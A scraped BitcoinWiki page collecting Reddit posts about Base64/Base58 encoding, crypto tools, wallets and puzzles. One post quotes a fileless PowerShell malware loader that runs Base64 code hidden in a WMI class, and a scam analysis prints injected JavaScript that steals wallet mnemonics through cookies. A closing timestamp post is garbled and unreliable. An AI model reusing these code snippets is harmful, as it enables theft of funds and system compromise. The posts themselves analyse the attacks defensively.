Base58 algorithm. All about cryptocurrency - BitcoinWiki

Base58 (Bitcoin addresses) vs Base64 Encoding

Base58 (Bitcoin addresses) vs Base64 Encoding submitted by kvothe1956 to Bitcoin [link] [comments]

FOSRES: The 'HackerRank' for Security Engineers

Hello cybersecurity community,
with the permission of moderator u/uid_0 of cybersecurity,
I present the first demo problem to FOSRES (Free and Open Source Security Research):
https://fosres.repl.co/html/base64.html
And the homepage for the website is at:
https://fosres.repl.co/

Unlike 'HackerRank', FOSRES aims to build practical security engineering skills in users.
At the bottom of the page, there will be a online code submission portal that allows you to complete
the first challenge, which is for Base64 Encoding.
Please let me know if you liked the concept and would like to see more problems like these.
I aim to guide users to build Bitcoin from scratch through these online code submission challenges as the first topic.
The first challenge you saw on Base64 Encoding was meant to be the first problem in that series.
For those interested, the complete source code for this website in progress is at:
https://gitlab.com/fosres/rosres
Thanks to the moderator of cybersecurity for allowing me to post this!
submitted by fosres to cybersecurity [link] [comments]

[XMAS] Send your loved ones some Bitcoin Cash this year!

I've created a template for the cashaddress.org website, that changes it into a Christmas themed layout.
Here's the link to an example: https://forum.bitcoin.com/bitcoin-discussion/send-your-loved-ones-some-bitcoin-cash-this-year-t60937.html
You can preview what it looks like, and play around with it, here: http://xmas.bitligo.com
You probably shouldn't use an online version. If anyone needs a how-to how to adapt the cashaddress.org offline html file to this, then let me know.
The SHA256 hash of the changed html file is: 1643530a4d4c814497c33172c9eb59895e349499e8c84cb848f49a566151071a. It has two changes: the graphic for the paper wallet is changed, and I have changed the QR rendering code so that it only prepends 'bitcoincash:' on the Bitcoin Cash Address, but not on the Private Key QR code (otherwise the Bitcoin.com wallet doesn't recognize the Private Key when scanning).
submitted by arnoudk to btc [link] [comments]

CryptoTools.net - A simple client-side cryptographic tool suite

Hey everyone! My apologies in advance from the plug, but I just wanted to show off my project, CryptoTools.net. It has no ads, no trackers, and does not ask for money.

Backstory

I got sick of bouncing around from site to sketchy site while trying to perform the simplest of cryptographic operations: things like hashing a string, converting base64, or encrypting a string. Each site had their own way of doing things as well, with a large portion of them POSTing all of the data to the server for it to do the calculations (a major no-no for those unfamiliar). Even some of the good sites were single-purpose with clunky UIs and forgettable URLs. I have yet to meet anyone who has memorized every OpenSSL command, myself included.
There's no shortage of crypto implementations in Javascript, but they're usually implemented in the background of a larger application, not presented in plain form for users to take advantage of as they please.
For these reasons, I decided to make my own collection of tools. All client side, easy to use, mobile friendly, and compatible with OpenSSL! Most tools also include DIY instructions for self-serve. All source code is on GitHub and all libraries are attributed to their authors. Rule #1 of crypto is to never roll your own crypto, so only outside libraries were used for that.

Tools

I hope at least some of you find these tools as useful as I do! I'm always open to suggestions for improvement. Thanks for reading!
submitted by rotorcowboy to privacytoolsIO [link] [comments]

Deciphering Cmd command

Quick recap: SEP/EDR Sonar is flagging malicious script on a 2008 Server. Powershell is base64 encoded and runs in the background and bypasses execution policy. decoded part tries to kill xmrig a bitcoin miner among other things. I can't find where the script is running from. SEP, Malwarebytes, PowerEraser, Symdiag all comeback with nothing.
I am in the process of rolling back/rebuilding the server but I really want to solve this puzzle. I noticed msiexec is using 63% cpu fairly consistently. Looking more into it, its running out of C:\Windows\Panther and has the same sha256 as powershell. Submitted it to VT and Hybrid-Analysis, both say its powershell. Hybrid had a few suspicious findings but it still had a low score.
I did a dump of the running msiexec process and found the following command:
"C:\Windows\Panther\msiexec.exe" $WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))

I really think this might be the source, can someone help me decipher what that command is doing?
submitted by Bubblinjuggalo to PowerShell [link] [comments]

CryptoTools.net - A simple client-side cryptographic tool suite

Hey everyone! My apologies in advance from the plug, but I just wanted to show off my project, CryptoTools.net. It has no ads, no trackers, and does not ask for money.

Backstory

I got sick of bouncing around from site to sketchy site while trying to perform the simplest of cryptographic operations: things like hashing a string, converting base64, or encrypting a string. Each site had their own way of doing things as well, with a large portion of them POSTing all of the data to the server for it to do the calculations (a major no-no for those unfamiliar). Even some of the good sites were single-purpose with clunky UIs and forgettable URLs. I have yet to meet anyone who has memorized every OpenSSL command, myself included.
There's no shortage of crypto implementations in Javascript, but they're usually implemented in the background of a larger application, not presented in plain form for users to take advantage of as they please.
For these reasons, I decided to make my own collection of tools. All client side, easy to use, mobile friendly, and compatible with OpenSSL! Most tools also include DIY instructions for self-serve. All source code is on GitHub and all libraries are attributed to their authors. Rule #1 of crypto is to never roll your own crypto, so only outside libraries were used for that.

Tools

I hope at least some of you find these tools as useful as I do! I'm always open to suggestions for improvement. Thanks for reading!
submitted by rotorcowboy to cryptography [link] [comments]

Help me solve a Bitcoin puzzle in Paris!

UPDATE: The puzzle has been solved! (not by me).
To see the other Easter eggs I uncovered, read below. They are interesting. The person who solved it has promised to reveal the full riddle and I will link to it once it's available.
Artist Pascal Boyart recently created a beautiful street mural inspired by the La Liberté guidant le peuple and incorporated the recent bouts of protests and unrest lead by the 'yellow jackets'.
He's hidden 0.26 BTC in the painting (now up to 0.29 BTC). It's up for the viewer to solve the puzzle to unlock the coins.
I happen to live walking distance from the mural and being both a lover of art and Bitcoin I thought I would investigate. I've solved part of the puzzle, but have hit a roadblock and now asking for help from the community.
The Rules:
The artist has said that part of the puzzle can be solved from the visual. The remainder of the puzzle can only be solved by visiting the mural in person.
Take a moment to review the full image and see if anything sticks out to you.
Clue 1:
On the bottom right hand corner of the mural is a message. "SEED 12 WORDS"
The obvious interpretation here is that he's telling us to look for 12 seed words to unlock the private key. So far so good.
Clue 2:
I noticed this part of the painting had faint brush strokes that looked like characters.
Sure enough, playing with color inversion in Photoshop shows a clear coded message!
The code seems to be:
mq+cC6A x2+8R8LAnE WgQnA==
This looks like a PGP style encryption format. There is also an email below. I went ahead and e-mailed the artist.
Clue 3:
The artist actually responded to me with this message.
He's suggesting I may not have the characters correct and then leaves a hint in the form of numbers: "03012009"
On quick inspection it appears to be a date. This translates (in euro coded dates) to Jan 03 2009... or the date of the Bitcoin genesis block.
FINAL
Where I'm stuck and need your help
I've run the encrypted message above through a variety of online decoders looking for a translation or additional clues.. but have had no luck. Also it is confusing as to why the artist would link me to the genesis block date. Ideas?
Is it possible the message is encoded using the genesis block public key? Or am I missing something more elemental?
What sticks out to you in the painting that may hint at the 12 seed words? Remember that some will be solvable just through the image.
Help me brainstorm here...
Addendum
There were other hidden messages in the painting. I'll outline them below.
Discovery #1
On the left side of the painting near the woman's arm was this coded message.
This is a Base64 string. You can use online tools like this to decode the message.
The two stings are:
  1. Y29uZHVpcmU = "conduire"
  2. dHJpb21waGU = "triomphe"
Both of these words are French and are on the Bips-39 seed word list. This was my first clue that the seed words were in French.
Discovery #2
Above the woman are two more coded words.
These don't conform to Base64... and took some time to figure out. A friend suggested the Cesar Chiper.
Using the Cesar Chiper, this is what appears:
  1. ATOUT = "union" at shift 6
  2. JPAVFLU = "citoyen" at shift 7
The fact that french words emerged from the Cesar cipher and that they were both on the list of french seed words lent credibility to the notion that seed words are french... and perhaps the shift was a clue for order.
This is as far as I got!
It was super fun ... and I'm very curious to know the solution... the art piece was amazing as well and worth the visit alone.
Thanks for all contributions to this thread and helping try to sort the mystery!
submitted by DamonAndTheSea to BitcoinMarkets [link] [comments]

My analysis of the $1 million+ USD MyBTGWallet.com scam

Pre-content edit: Many of the links have been edited to be "hxxp" links and moved to the end of the post to minimize the chance of somebody accidentally accessing malicious software. If you try to visit a link and it doesn't appear valid, check if it's an "hxxp" link and change it to "http"
Search the Internet (or reddit) for mybtgwallet today, and you'll find several results about people losing all of their Bitcoin after inputting their mnemonic phrase into MyBTGWallet, a website claiming to be an online web wallet for Bitcoin Gold where users could check their BTG balance and, ostensibly, one day use the website to transact with their Bitcoin Gold.
I have no reason to believe that anybody involved with Bitcoin Gold was involved with this scam, but they did have a conversation with the creator of the website and help him test its balance reporting features[1] and did list it under the Wallets section of their website from November 12[2] to November 14[3], so at the very least they are guilty of carelessness and negligence.
In reports online, many affected users reported their Bitcoin having been swept to this wallet, although this website lists several other Bitcoin wallets, totalling over $1 million USD in stolen Bitcoin.
The source code for the site technically exists[4], but the repository has an upload date of November 15, where the conversation linked above took place last month. Clearly the repository was deleted and the code was scrubbed and reuploaded.
(Note from Future Uejji: The link above is broken. At the time I made this post, it contained a clean version of the scam code. I don't believe you're missing out by not being able to examine it today.)
Luckily, while trying to "help" audit the MyBTGWallet code, Technophant forked[5] the code, which gave us donate address for JohnDass. Notice also that this address was displayed on the site on November 13[6] but was changed by the next day[7].
(Note from Future Uejji: It doesn't seem like the version of the code Technophant forked and audited contained the malicious code I describe below. However, I don't think this should excuse the team from revalidating it once the website went live.)
It seems as if JohnDass tried to cover his tracks. However, the address above has a transaction linking it to the above mentioned scammer's wallet. Either JohnDass himself was also scammed by his very own wallet or he is the actual scammer.
Now, that's all well and good, but how did he do it?
My first clue was the snapshot version of bitcoinjs.min.js[8]. Despite being a .min.js, the code was niceified. So I compared it against a legitimate version of the bitcoinjs code and found an interesting change.
In hdnode.js, lines 34,35:
if (seed.length < 16) throw new TypeError('Seed should be at least 128 bits')
if (seed.length > 64) throw new TypeError('Seed should be at most 512 bits')
Compare this to the version on MyBTGWallet:
if (seed.length < 16) throw new TypeError('Seed should be at least 128 bits')
if (window.gtagm) {document.cookie='_gtag='+btoa(window.gtagm);delete window.gtagm;}
if (seed.length > 64) throw new TypeError('Seed should be at most 512 bits')
This son-of-a-bitch buried this nefarious line of code right in the middle of the bitcoin javascript library. But what does it do?
Well, I checked the website's other javascript files for gtag, and here's what I found:
MyBTGWallet's version of bip39.min.js[9] has also been niceified. I don't have to compare it to the actual source, though, because searching for gtag brought up this section:
function mnemonicTowords(mnemonic){
if(!window.gtagm) window.gtagm = mnemonic;
}
Two guesses what the mnemonic variable is. This function is called just a few lines up in the same file:
function mnemonicToSeed (mnemonic, password) {
var mnemonicwords = mnemonicTowords(mnemonic);
So, whenever mnemomnicToSeed() is called, the user-input mnemonic is saved to window.gtagm, which later on is obfuscated to Base64 (which is what the btoa() function does), and then appended to a _gtag parameter on the document cookie. Any of you who have ever used Google Analytics might see where this is going.
At the very end of the website's primary javascript code[10] lives a little bit of code meant to enable Google Analytics, which happily snaps up the user's cookie on the site and stores it for the scammer to view later.
Note that this was just a small amount of code that enabled this scheme. Even trying to trace what connections the website was making all looked legit, except for Google Analytics, which he claimed to be using to track website usage.
So, to summarize, every time someone entered their mnemonic seed into MyBTGWallet, their mnemonic was Base64 encoded, stored on the website cookie and then transmitted to Google, where the scammer was free to decode it and have full access to that person's private keys derived from that seed.
And that's how somebody scammed the Bitcoin community out of over $1 million USD and scammed the Bitcoin Gold team into recommending his website to do so.
EDIT: Some grammar and formatting.
EDIT 2: Some extra info about Technophant's fork of the code.
EDIT 3: It looks like archive.org is being inconsistent about the availability of the above links. They were all available when I posted the links. Probably some of their servers have the files and others don't.
EDIT 4: Several people have talked about hoping this scammer could be tracked down, etc. While not impossible, I consider it practically impossible that this person will be tracked down.
I primarily made this post to illustrate how simple this entire attack was from start to finish. So, here's my tl;dr for you:
  1. Always assume somebody is going to try to steal your crypto, especially if it's Bitcoin.
  2. Never trust anybody with your private key or mnemonic, even if you would trust that person otherwise.
  3. To expand on 2, IF ANYBODY TELLS YOU THAT A THIRD PARTY CAN BE TRUSTED WITH YOUR PRIVATE KEY OR MNEMONIC, YOUR DEFAULT ACTION SHOULD BE DISTRUST. Distrust the third party and distrust whoever is telling you to trust the third party, unless/until safety can be rigorous proven.
  4. Your private key or mnemonic is the only thing proving that you own and can control your crypto. DO NOT GIVE IT TO ANYONE. DO NOT ENTER IT ANYWHERE IT COULD BE COPIED OR STORED. DON'T EVEN COPY AND PASTE IT IF YOU CAN HELP IT.
  5. Finally, WHEN YOUR CRYPTO IS GONE, IT IS GONE. There is no company to give you a refund, no bank to reverse your transaction. Any stories you read about stolen crypto that was recovered were just stories. Never assume they could happen to you.
PEOPLE ARE GOING TO TRY TO MANIPULATE YOU INTO GIVING THEM ACCESS TO YOUR CRYPTO. IF YOU LET THEM, YOUR CRYPTO WILL BE GONE FOREVER.
EDIT 5: Kyhwanapardus used the information in this post to produce this analysis from the Google Analytics side.
FOOTER: Here are the links referenced in the main body of this post.
[1]: hxxps://github.com/BTCGPU/BTCGPU/issues/100
[2]: hxxps://web.archive.org/web/20171112163946/hxxps://bitcoingold.org/
[3]: hxxps://web.archive.org/web/20171114222234/hxxps://bitcoingold.org/
[4]: hxxps://github.com/John-Dass/btcgpuwallet
[5]: hxxps://github.com/Technophant/btcgpuwallet
[6]: hxxps://web.archive.org/web/20171113184358/hxxps://mybtgwallet.com/
[7]: hxxps://web.archive.org/web/20171114235844/hxxps://mybtgwallet.com/
[8]: hxxps://web.archive.org/web/20171115010145js_/hxxps://mybtgwallet.com/bitcoinjs/bitcoinjs.min.js?v=20171108
[9]: hxxps://web.archive.org/web/20171115010146js_/hxxps://mybtgwallet.com/bitcoinjs/bip39/bip39.min.js?v=20171108
[10]: hxxps://web.archive.org/web/20171115010146js_/hxxps://mybtgwallet.com/application.js?v=20171110
submitted by Uejji to btc [link] [comments]

Groestlcoin June Development Update & Release!

Another Quarter, Another Release! The Groestlcoin production factory has been working overtime as always in order to deliver even more tech to push Groestlcoin mainstream when the time comes.
There have been many new fantastic wallets and exchanges added to Groestlcoins repertoire over the past 3 months so we will re-cap these before moving on to what is new today.

Recap

What's New

Re-forged: Groestlcoin Samourai

Groestlcoin Samourai is a wallet for the streets. A modern Groestlcoin wallet hand-forged to keep your transactions private, your identity masked, and your funds secure. Its main advantages are its extreme portability and is the most secure Groestlcoin mobile HD wallet.
We've built a wallet that Groestlcoin deserves. If you are looking for a wallet that Silicon Valley will never build, the regulators will never allow, and the VC's will never invest in, this is the perfect wallet for you.
![Groestlcoin Samourai Release Video](http://img.youtube.com/vi/i3WU8Tde8XQ/0.jpg)

Head over to the Groestlcoin Samourai Release Page here for the full release announcement.

New: GroestlImage

Groestlimage turns any file into a mnemonic phrase allowing users to generate Groestlcoin private keys and addresses based on the data URI of the provided file. A picture is worth a thousand Groestls.

Features:

Link

https://groestlcoin.org/groestlimage/

Source Code

https://github.com/Groestlcoin/groestlimage

New: Groestlcoin Core Config Generator

Groestlcoin Core Config Generator is a simple GUI to configure the groestlcoin.conf file – A developers dream tool!
Each configuration option is available via the user interface, grouped by what attributes they affect. For ease of getting started with a new configuration, a variety of preset "node classes" are available on the right-hand-side of the screen. Selecting a preset will load our recommended base configuration for a node fitting that description, at which point you can then tune the configuration at the single option level.

Features

Link

https://config.groestlcoin.org/

Source Code

https://github.com/Groestlcoin/groestlcoin-core-config-generator

New: Groestlcoin Dumb Block Explorer

Dumb Block Explorer is a trivial block explorer written in a single PHP file. Now everybody can run their own block explorer.

Features

Link

https://www.groestlcoin.org/explore

Source Code

https://github.com/Groestlcoin/dumb-block-explorer

New: Groestlcoin SMS Push TX

Groestlcoin Simple Push TX is a server to push Groestlcoin transactions via SMS. Now everybody can send new transactions via SMS if the Internet is not usable (i.e. blocked by government entities or becomes otherwise unavailable).

Features

Source Code

https://github.com/Groestlcoin/smspushtx

Update: Electrum-GRS 3.3.6

Electrum-GRS is Groestlcoins #1 thin-client for Windows, MacOS, Linux and Android, based on a client-server protocol. Supporting multi-sig wallets without the bloat of downloading the entire blockchain.

New Features (Universal)

New Features (Windows, MacOS, Linux)

New Features (Android)

Link

https://github.com/Groestlcoin/electrum-grs/releases/download
https://play.google.com/store/apps/details?id=org.groestlcoin.electrumgrs

Source Code

https://github.com/Groestlcoin/electrum-grs
submitted by Yokomoko_Saleen to groestlcoin [link] [comments]

My attempt at a Tooth Fairy paper wallet design. Any idea how to get this to work with something like bitaddress.org?

My attempt at a Tooth Fairy paper wallet design. Any idea how to get this to work with something like bitaddress.org? submitted by Lentil-Soup to Bitcoin [link] [comments]

Hopefully a satisfactory solution for wallet addressing and asynchronous transactions.

My enthusiasm for grin took a hit when I learned it needs interaction between the sender and the receiver. But it turns out it may actually be an advantage over Bitcoin-like coins were you pay to a public key hash: I remember reading a criticism of standard Bitcoin payment protocol, where wallets keep generating addresses indefinitely, and then has to match each new transaction to the every known address in order to identify incoming payments. Grin's mandatory interaction between parties, albeit less flexible, seems a more sane approach, computer resources-wise.
But how to send money when the recipient is offline? Certainly there must be a way to send a message that will be delivered when the recipient goes online, which will send the response though the same medium, and back and forth so eventually the transfer is settled. What kind of technology has this property? The obvious answer, which has been around for more than 50 years is: email. We configure our wallets with an email account for receiving money (via SMTP or any other connection method to the mail server) and a PGP key, and whenever an email is delivered, the wallet scans its contents in search of a PGP encrypted block. If it is found, it is decrypted, parsed, processed and responded to the "Reply-To:" or "Sender:" email header. After a few exchanges, the transaction is ready for broadcast. In order to prevent email hijack, the GrinMail address should also contain the PGP fingerprint of the recipient. The sender would first search for the public key on keyservers on the web, and if not found, query it via email, which will be responded and automatically checked against the fingerprint. Since all but the query messages will be encrypted, there is no risk of a middleman controlling the email service stealing the funds.
The URI could look like this, where the part after '?' is the Base64 encoded fingerprint:
grinmail:[email protected]?Q1FDobX8i7cKOqmxD2ZzqENRQ6G1/Iu3CjqpsQ9mc6g=
There is great flexibility in email usage in this way: - you can either use your ordinary email account or have an specific account to use with your wallet; - you can have multiple emails per wallet, and anyone communicating through one email will know no connection with another account; - you can use throwaway email accounts; - you can have your own email server; - you can use one of hundreds of free email services; - you can use privacy focused email services; - the transaction emails may either be deleted or stored.
As I understand, this scheme still requires the recipient wallet to be hot, i.e. have unencrypted EC keys in order to build the transaction, but it at least can solve the need for the parties to be simultaneously online using a widely available (and often free) message delivery mechanism.
What do you think?
submitted by lcvella to grincoin [link] [comments]

Insurance files timestamp proofs using bitcoin!!

We show you TIMESTAMP PROOF wikileak torrents!!! You want attestation!! Big win very wikileaks. FTW Julian Assange?? REMAINS SAFE.
sha256 insurance file torrents
620ec1c72a087f39da0ed4544b13661959243861d94de32bc467e22bd156b2c8 2016-06-03_insurance.aes256.torrent 0c7fcd70aea059af6afede372a35f41e5cd4d745a08e94a9e47b6b3bb932b081 wikileaks-insurance-20120222.tar.bz2.aes.torrent c8adcb0f0a066d77d2850046849d6c6ddcc52a73d4a4280eb845745e885489d2 wlinsurance-20130815-A.aes256.torrent 56ada05ed025d135db3e5ee0762bcf7116a3e5c66354b37fb507a4d57add2923 wlinsurance-20130815-B.aes256.torrent 1f1c20edb6e4c69300a198ea8c5c85de5b3680d7841d82c93ab875c2e9f472da wlinsurance-20130815-C.aes256.torrent 
Those files dispute twitter yes?? Youu need proofs??? Super critical must checks!!
Timestamping!!!!! See https://petertodd.org/2016/opentimestamps-announcement See https://github.com/opentimestamps/opentimestamps-client
base64 encoded OpenTimestamps PARTIALS
2016-06-03_insurance.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIYg7BxyoIfznaDtRUSxNmGVkkOGHZTeMrxGfiK9FWssjwECn+cxB1pjJeP/uwzRhxqMsI8SB7U4MeGSLvP0fSahJqAhBeIaKGopy9OXuXIEkWUd69BwjwIEfYO6XYzgoGgUAzHL7nH1/zsAgiWyS++i7k5g75aABDCPEgJ1s54XTqmox0s9moXpgH+NcrbXLI9Uo2xipxwFSAQ6QI8CAc0iMVj0AjyyqAeqOmCiv8my8i7pAbwgIHnjGtfjk50AjwIC8jjDcZEKGr+WS/WtD2yz8doGhnC+4X23St9Vgxg+wjCPAg3GV8OBcAWoNHMHtTgm0KSO3rpGr3fIVZRymk3+VDbMQI8CAzeTBpzTxxzzG6Sn795AY5VbfgtuKFBiTqaqZaShH/NwjwIGd+HRYcs/1zkOLg7g0OfkDTG2pM66M3NUg5Ymy8P3T+CPAgO0dPFWNAsKJSWOV4bbTrPunHzRvhv8ZpCxDyS9dTjcYI8CBlV/HfxtaCbdhWA1qavmhMTqFGH5nU/sYiMf91taKM0AjwICdX7N3wWWYx3eDCFGn1PvWswQYDVwXrZp/3pFXNMZitCP/wEC3cLhmtPEZYWGHFX8AI2DUI8QRYBlxs8AjoBcaj/FjwEgCD3+MNLvkMji4taHR0cHM6Ly9hbGljZS5idGMuY2FsZW5kYXIub3BlbnRpbWVzdGFtcHMub3Jn8BB+v2Vqz09usWndEEHBSY35CPEEWAZcbPAI4yFyq58B490Ag9/jDS75DI4sK2h0dHBzOi8vYm9iLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmc= wikileaks-insurance-20120222.tar.bz2.aes.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIDH/NcK6gWa9q/t43KjX0HlzU10WgjpSp5HtrO7kysIHwEGekeLNDtc+4EWWKWkj4XucI8CDbjCmAM6VlOoImr8lhBcE1F1X3QSZdK/gKl6WVbn5zoQjwINM3TPOAERCFXSJ5NY99u1msYQL43SxqnFZJENHlsp7CCPAge2XBkc4qKe5znkFpQF1xtuqO2QbxU2RlAlyN16UjN+UI8CBawzF05vi8lM9vEf6XzhmmbLifz03oW9VhEVKuuatioQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BIAg9/jDS75DI4uLWh0dHBzOi8vYWxpY2UuYnRjLmNhbGVuZGFyLm9wZW50aW1lc3RhbXBzLm9yZ/AQfr9las9PbrFp3RBBwUmN+QjxBFgGXGzwCOMhcqufAePdAIPf4w0u+QyOLCtodHRwczovL2JvYi5idGMuY2FsZW5kYXIub3BlbnRpbWVzdGFtcHMub3Jn wlinsurance-20130815-A.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIyK3LDwoGbXfShQBGhJ1sbdzFKnPUpCgOuEV0XohUidLwENpD/C5rWB/RfyzWMF283ssI8SDPExB02U8wBlYOU/shtN747Gp1BzUHtfmvLqeRESvHnwjxIBqzlGQwdP+OaQJO9DWAJ6TCx8Gm9b9DBoMUVLc4rSfxCPAgZRaOuID+vFtcH/M97dhKzHdZZjRdMFjguU5eQtsuMDYI8SCkZNcKTaElNVogwb/FXdR+DvJzNJWyoTiCBwYWMAdFeQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BIAg9/jDS75DI4uLWh0dHBzOi8vYWxpY2UuYnRjLmNhbGVuZGFyLm9wZW50aW1lc3RhbXBzLm9yZ/AQfr9las9PbrFp3RBBwUmN+QjxBFgGXGzwCOMhcqufAePdAIPf4w0u+QyOLCtodHRwczovL2JvYi5idGMuY2FsZW5kYXIub3BlbnRpbWVzdGFtcHMub3Jn wlinsurance-20130815-B.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIVq2gXtAl0TXbPl7gdivPcRaj5cZjVLN/tQek1XrdKSPwEO2lx6UzOFnz24Bx/dToNJoI8CCAFe8K9R+UiJ4QSBodRaRsKzThCKVWkDLZjXhzjISamAjwID7fXZuzTZJXoqie9X50LlKvXiN/1JkfDrGs9n/XU6JLCPEgiUKlqQExsSDv1T8X/W6FvQYPPLMs/M821+TsajW1ln0I8SCkZNcKTaElNVogwb/FXdR+DvJzNJWyoTiCBwYWMAdFeQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BIAg9/jDS75DI4uLWh0dHBzOi8vYWxpY2UuYnRjLmNhbGVuZGFyLm9wZW50aW1lc3RhbXBzLm9yZ/AQfr9las9PbrFp3RBBwUmN+QjxBFgGXGzwCOMhcqufAePdAIPf4w0u+QyOLCtodHRwczovL2JvYi5idGMuY2FsZW5kYXIub3BlbnRpbWVzdGFtcHMub3Jn wlinsurance-20130815-C.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIHxwg7bbkxpMAoZjqjFyF3ls2gNeEHYLJOrh1wun0ctrwEFi2OueyJJWy2pXF4T8wKGsI8SCcsZ6cdQgf9XMUQyh8Ys2Vdrz4d/MgCs8AdVaYLUrdPgjwID7fXZuzTZJXoqie9X50LlKvXiN/1JkfDrGs9n/XU6JLCPEgiUKlqQExsSDv1T8X/W6FvQYPPLMs/M821+TsajW1ln0I8SCkZNcKTaElNVogwb/FXdR+DvJzNJWyoTiCBwYWMAdFeQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BIAg9/jDS75DI4uLWh0dHBzOi8vYWxpY2UuYnRjLmNhbGVuZGFyLm9wZW50aW1lc3RhbXBzLm9yZ/AQfr9las9PbrFp3RBBwUmN+QjxBFgGXGzwCOMhcqufAePdAIPf4w0u+QyOLCtodHRwczovL2JvYi5idGMuY2FsZW5kYXIub3BlbnRpbWVzdGFtcHMub3Jn 
base64 encoded OpenTimestamps
2016-06-03_insurance.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIYg7BxyoIfznaDtRUSxNmGVkkOGHZTeMrxGfiK9FWssjwECn+cxB1pjJeP/uwzRhxqMsI8SB7U4MeGSLvP0fSahJqAhBeIaKGopy9OXuXIEkWUd69BwjwIEfYO6XYzgoGgUAzHL7nH1/zsAgiWyS++i7k5g75aABDCPEgJ1s54XTqmox0s9moXpgH+NcrbXLI9Uo2xipxwFSAQ6QI8CAc0iMVj0AjyyqAeqOmCiv8my8i7pAbwgIHnjGtfjk50AjwIC8jjDcZEKGr+WS/WtD2yz8doGhnC+4X23St9Vgxg+wjCPAg3GV8OBcAWoNHMHtTgm0KSO3rpGr3fIVZRymk3+VDbMQI8CAzeTBpzTxxzzG6Sn795AY5VbfgtuKFBiTqaqZaShH/NwjwIGd+HRYcs/1zkOLg7g0OfkDTG2pM66M3NUg5Ymy8P3T+CPAgO0dPFWNAsKJSWOV4bbTrPunHzRvhv8ZpCxDyS9dTjcYI8CBlV/HfxtaCbdhWA1qavmhMTqFGH5nU/sYiMf91taKM0AjwICdX7N3wWWYx3eDCFGn1PvWswQYDVwXrZp/3pFXNMZitCP/wEC3cLhmtPEZYWGHFX8AI2DUI8QRYBlxs8AjoBcaj/FjwEv8Ag9/jDS75DI4uLWh0dHBzOi8vYWxpY2UuYnRjLmNhbGVuZGFyLm9wZW50aW1lc3RhbXBzLm9yZwjwIAkuszqsTHhdSiVjRMypZF414MZcas2dZoa37SHIF9aRCPAg5CW83bvhSkStXBQFPvMNeQwvgMfpOHjP5Yq3NgKjXg8I8CCaNcdS1lzRwldhEATb6/Hh0SuNuEH5C8KeGuaAF9kNiAjxIMID2bhWmpJh2LaEelXkG6vgC/aRj6UDVl3u3pnS/PKQCPAggN4YQydHZpDvRwtBpH2X+nPNvURl1K0/BXPKericWDgI8CAmaygyNasTw/aoIenqRdc1YpltXBWU5fv8DTgqdkVOcQjxrgEBAAAAAbn99zMYMRrT/GahujdtOEWF6d24eCq8l5vtQn8qxKWnAAAAAEhHMEQCIA/4ZuMnhOlkLpmiYS+ew8INp2hF7iNWqNmq7odixDrXAiAAxJQWo5obbMRMPbDssp4Xatdo9EpwQtYDCdvHEst9fAH9////Ak4UOgAAAAAAIyEC9FsImsN9ancYiYNcqDiV812p13rtWUfjNzmsTRSpGfesAAAAAAAAAAAiaiDwBNGiBgAICPEgZNXmKjhtUdjJNnioYMhRi68efqCforIUKthSuVq+UekICPAgRVtu2ZYqU7m3ZMceRS5GkKPUnWzf5g3tPRIrjlKt+xgICPAgGyqA+YyInYbKTE5/kgf+rQrlKI8RkO7E91bPMXsQwgMICPEgUQxLXM8wsLirbTEa1wC6pFe4BaTanxqhfzIw81CABT4ICPAgd3+yhYGOl3S9C0YjAch0R+